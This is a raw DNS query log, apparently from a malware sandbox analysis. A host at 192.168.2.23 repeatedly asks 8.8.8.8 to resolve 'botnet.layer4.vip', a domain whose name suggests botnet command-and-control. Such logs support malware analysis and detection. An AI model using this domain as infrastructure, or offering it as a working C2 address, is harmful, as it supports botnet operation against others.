                                  Apr 9, 2023 03:31:59.308048010 CEST192.168.2.238.8.8.80x26aaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.323820114 CEST192.168.2.238.8.8.80xb17dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.348057032 CEST192.168.2.238.8.8.80xb17dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.372538090 CEST192.168.2.238.8.8.80xb17dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.396827936 CEST192.168.2.238.8.8.80xb17dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.412626028 CEST192.168.2.238.8.8.80xb17dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.437145948 CEST192.168.2.238.8.8.80xf493Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.461129904 CEST192.168.2.238.8.8.80xf493Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.485260963 CEST192.168.2.238.8.8.80xf493Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.509807110 CEST192.168.2.238.8.8.80xf493Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.525851965 CEST192.168.2.238.8.8.80xf493Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.541574955 CEST192.168.2.238.8.8.80x3ce9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.565743923 CEST192.168.2.238.8.8.80x3ce9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.582614899 CEST192.168.2.238.8.8.80x3ce9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.607275963 CEST192.168.2.238.8.8.80x3ce9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.631750107 CEST192.168.2.238.8.8.80x3ce9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.656088114 CEST192.168.2.238.8.8.80xfeddStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.672230959 CEST192.168.2.238.8.8.80xfeddStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.688208103 CEST192.168.2.238.8.8.80xfeddStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.710083008 CEST192.168.2.238.8.8.80xfeddStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.734230995 CEST192.168.2.238.8.8.80xfeddStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.749946117 CEST192.168.2.238.8.8.80xdbdbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.774149895 CEST192.168.2.238.8.8.80xdbdbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.798278093 CEST192.168.2.238.8.8.80xdbdbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.822681904 CEST192.168.2.238.8.8.80xdbdbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.847043991 CEST192.168.2.238.8.8.80xdbdbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.862596035 CEST192.168.2.238.8.8.80x3196Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.878487110 CEST192.168.2.238.8.8.80x3196Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.902919054 CEST192.168.2.238.8.8.80x3196Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.918725967 CEST192.168.2.238.8.8.80x3196Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.934587955 CEST192.168.2.238.8.8.80x3196Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.950648069 CEST192.168.2.238.8.8.80x9bbeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.974819899 CEST192.168.2.238.8.8.80x9bbeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.999265909 CEST192.168.2.238.8.8.80x9bbeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.024153948 CEST192.168.2.238.8.8.80x9bbeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.049328089 CEST192.168.2.238.8.8.80x9bbeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.064891100 CEST192.168.2.238.8.8.80xd3deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.081442118 CEST192.168.2.238.8.8.80xd3deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.097377062 CEST192.168.2.238.8.8.80xd3deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.113260984 CEST192.168.2.238.8.8.80xd3deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.129169941 CEST192.168.2.238.8.8.80xd3deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.153311968 CEST192.168.2.238.8.8.80x481Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.177805901 CEST192.168.2.238.8.8.80x481Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.193592072 CEST192.168.2.238.8.8.80x481Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.209505081 CEST192.168.2.238.8.8.80x481Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.225138903 CEST192.168.2.238.8.8.80x481Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.249802113 CEST192.168.2.238.8.8.80xfc56Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.265820980 CEST192.168.2.238.8.8.80xfc56Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.290333986 CEST192.168.2.238.8.8.80xfc56Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.314508915 CEST192.168.2.238.8.8.80xfc56Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.339051962 CEST192.168.2.238.8.8.80xfc56Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.363538027 CEST192.168.2.238.8.8.80xb68bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.388072014 CEST192.168.2.238.8.8.80xb68bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.412369013 CEST192.168.2.238.8.8.80xb68bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.428220034 CEST192.168.2.238.8.8.80xb68bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.455182076 CEST192.168.2.238.8.8.80xb68bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.473228931 CEST192.168.2.238.8.8.80xab41Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.488667965 CEST192.168.2.238.8.8.80xab41Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.504564047 CEST192.168.2.238.8.8.80xab41Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.529162884 CEST192.168.2.238.8.8.80xab41Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.545186996 CEST192.168.2.238.8.8.80xab41Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.569443941 CEST192.168.2.238.8.8.80x4e28Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.585361004 CEST192.168.2.238.8.8.80x4e28Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.601172924 CEST192.168.2.238.8.8.80x4e28Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.625302076 CEST192.168.2.238.8.8.80x4e28Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.649512053 CEST192.168.2.238.8.8.80x4e28Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.674002886 CEST192.168.2.238.8.8.80xf0fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.698208094 CEST192.168.2.238.8.8.80xf0fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.722809076 CEST192.168.2.238.8.8.80xf0fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.747464895 CEST192.168.2.238.8.8.80xf0fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.763504028 CEST192.168.2.238.8.8.80xf0fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.779264927 CEST192.168.2.238.8.8.80x8a38Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.795113087 CEST192.168.2.238.8.8.80x8a38Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.819643974 CEST192.168.2.238.8.8.80x8a38Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.835347891 CEST192.168.2.238.8.8.80x8a38Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.859833002 CEST192.168.2.238.8.8.80x8a38Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.884027958 CEST192.168.2.238.8.8.80x27f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.899883986 CEST192.168.2.238.8.8.80x27f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.915731907 CEST192.168.2.238.8.8.80x27f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.931226969 CEST192.168.2.238.8.8.80x27f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.947082043 CEST192.168.2.238.8.8.80x27f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.962955952 CEST192.168.2.238.8.8.80xadd4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.978916883 CEST192.168.2.238.8.8.80xadd4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.995297909 CEST192.168.2.238.8.8.80xadd4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.019793987 CEST192.168.2.238.8.8.80xadd4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.035391092 CEST192.168.2.238.8.8.80xadd4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.059560061 CEST192.168.2.238.8.8.80x7a79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.083663940 CEST192.168.2.238.8.8.80x7a79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.099210978 CEST192.168.2.238.8.8.80x7a79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.123282909 CEST192.168.2.238.8.8.80x7a79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.147757053 CEST192.168.2.238.8.8.80x7a79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.163347006 CEST192.168.2.238.8.8.80xad26Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.187865019 CEST192.168.2.238.8.8.80xad26Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.204101086 CEST192.168.2.238.8.8.80xad26Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.228296041 CEST192.168.2.238.8.8.80xad26Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.252501011 CEST192.168.2.238.8.8.80xad26Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.268522024 CEST192.168.2.238.8.8.80x9213Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.292804003 CEST192.168.2.238.8.8.80x9213Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.317233086 CEST192.168.2.238.8.8.80x9213Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.333641052 CEST192.168.2.238.8.8.80x9213Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.349564075 CEST192.168.2.238.8.8.80x9213Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.373683929 CEST192.168.2.238.8.8.80x44e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.389250994 CEST192.168.2.238.8.8.80x44e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.405201912 CEST192.168.2.238.8.8.80x44e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.429600954 CEST192.168.2.238.8.8.80x44e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.445514917 CEST192.168.2.238.8.8.80x44e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.461606979 CEST192.168.2.238.8.8.80x73e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.485666037 CEST192.168.2.238.8.8.80x73e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.510159969 CEST192.168.2.238.8.8.80x73e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.525752068 CEST192.168.2.238.8.8.80x73e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.541333914 CEST192.168.2.238.8.8.80x73e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.557245970 CEST192.168.2.238.8.8.80x810aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.581350088 CEST192.168.2.238.8.8.80x810aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.596903086 CEST192.168.2.238.8.8.80x810aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.612432003 CEST192.168.2.238.8.8.80x810aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.627852917 CEST192.168.2.238.8.8.80x810aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.652388096 CEST192.168.2.238.8.8.80xbdcaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.668082952 CEST192.168.2.238.8.8.80xbdcaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.692600012 CEST192.168.2.238.8.8.80xbdcaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.708378077 CEST192.168.2.238.8.8.80xbdcaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.732594013 CEST192.168.2.238.8.8.80xbdcaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.756975889 CEST192.168.2.238.8.8.80xa5dbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.772867918 CEST192.168.2.238.8.8.80xa5dbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.797971964 CEST192.168.2.238.8.8.80xa5dbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.813910961 CEST192.168.2.238.8.8.80xa5dbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.831162930 CEST192.168.2.238.8.8.80xa5dbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.847630024 CEST192.168.2.238.8.8.80x370Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.864475965 CEST192.168.2.238.8.8.80x370Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.889408112 CEST192.168.2.238.8.8.80x370Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.913482904 CEST192.168.2.238.8.8.80x370Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.937916040 CEST192.168.2.238.8.8.80x370Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.953833103 CEST192.168.2.238.8.8.80x9fefStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.978025913 CEST192.168.2.238.8.8.80x9fefStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.993917942 CEST192.168.2.238.8.8.80x9fefStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.009860992 CEST192.168.2.238.8.8.80x9fefStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.025676012 CEST192.168.2.238.8.8.80x9fefStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.041523933 CEST192.168.2.238.8.8.80xe90fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.057034969 CEST192.168.2.238.8.8.80xe90fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.072549105 CEST192.168.2.238.8.8.80xe90fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.096892118 CEST192.168.2.238.8.8.80xe90fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.112498999 CEST192.168.2.238.8.8.80xe90fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.128434896 CEST192.168.2.238.8.8.80x8ae4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.144453049 CEST192.168.2.238.8.8.80x8ae4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.160077095 CEST192.168.2.238.8.8.80x8ae4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.175585032 CEST192.168.2.238.8.8.80x8ae4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.199601889 CEST192.168.2.238.8.8.80x8ae4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.223790884 CEST192.168.2.238.8.8.80x723bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.239783049 CEST192.168.2.238.8.8.80x723bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.263976097 CEST192.168.2.238.8.8.80x723bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.288368940 CEST192.168.2.238.8.8.80x723bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.303980112 CEST192.168.2.238.8.8.80x723bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.328381062 CEST192.168.2.238.8.8.80xf8b8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.343910933 CEST192.168.2.238.8.8.80xf8b8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.368328094 CEST192.168.2.238.8.8.80xf8b8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.384305000 CEST192.168.2.238.8.8.80xf8b8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.399874926 CEST192.168.2.238.8.8.80xf8b8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.415606976 CEST192.168.2.238.8.8.80xe499Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.431519032 CEST192.168.2.238.8.8.80xe499Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.447156906 CEST192.168.2.238.8.8.80xe499Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.462727070 CEST192.168.2.238.8.8.80xe499Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.478728056 CEST192.168.2.238.8.8.80xe499Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.494340897 CEST192.168.2.238.8.8.80x1dc8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.518672943 CEST192.168.2.238.8.8.80x1dc8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.542759895 CEST192.168.2.238.8.8.80x1dc8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.567080021 CEST192.168.2.238.8.8.80x1dc8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.582962990 CEST192.168.2.238.8.8.80x1dc8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.607430935 CEST192.168.2.238.8.8.80x8436Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.633220911 CEST192.168.2.238.8.8.80x8436Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.649679899 CEST192.168.2.238.8.8.80x8436Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.666074038 CEST192.168.2.238.8.8.80x8436Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.682213068 CEST192.168.2.238.8.8.80x8436Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.699079037 CEST192.168.2.238.8.8.80x4a0cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.723303080 CEST192.168.2.238.8.8.80x4a0cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.738923073 CEST192.168.2.238.8.8.80x4a0cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.754460096 CEST192.168.2.238.8.8.80x4a0cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.778995037 CEST192.168.2.238.8.8.80x4a0cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.795106888 CEST192.168.2.238.8.8.80xc6feStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.810997963 CEST192.168.2.238.8.8.80xc6feStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.826565981 CEST192.168.2.238.8.8.80xc6feStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.842730045 CEST192.168.2.238.8.8.80xc6feStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.859002113 CEST192.168.2.238.8.8.80xc6feStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.875051975 CEST192.168.2.238.8.8.80x609aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.900064945 CEST192.168.2.238.8.8.80x609aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.915844917 CEST192.168.2.238.8.8.80x609aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.940253019 CEST192.168.2.238.8.8.80x609aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.956780910 CEST192.168.2.238.8.8.80x609aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.972965002 CEST192.168.2.238.8.8.80xc899Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:02.997366905 CEST192.168.2.238.8.8.80xc899Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.013060093 CEST192.168.2.238.8.8.80xc899Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.028791904 CEST192.168.2.238.8.8.80xc899Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.053903103 CEST192.168.2.238.8.8.80xc899Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.069881916 CEST192.168.2.238.8.8.80x4677Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.094259977 CEST192.168.2.238.8.8.80x4677Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.118841887 CEST192.168.2.238.8.8.80x4677Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.143460989 CEST192.168.2.238.8.8.80x4677Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.159944057 CEST192.168.2.238.8.8.80x4677Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.176345110 CEST192.168.2.238.8.8.80xbd26Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
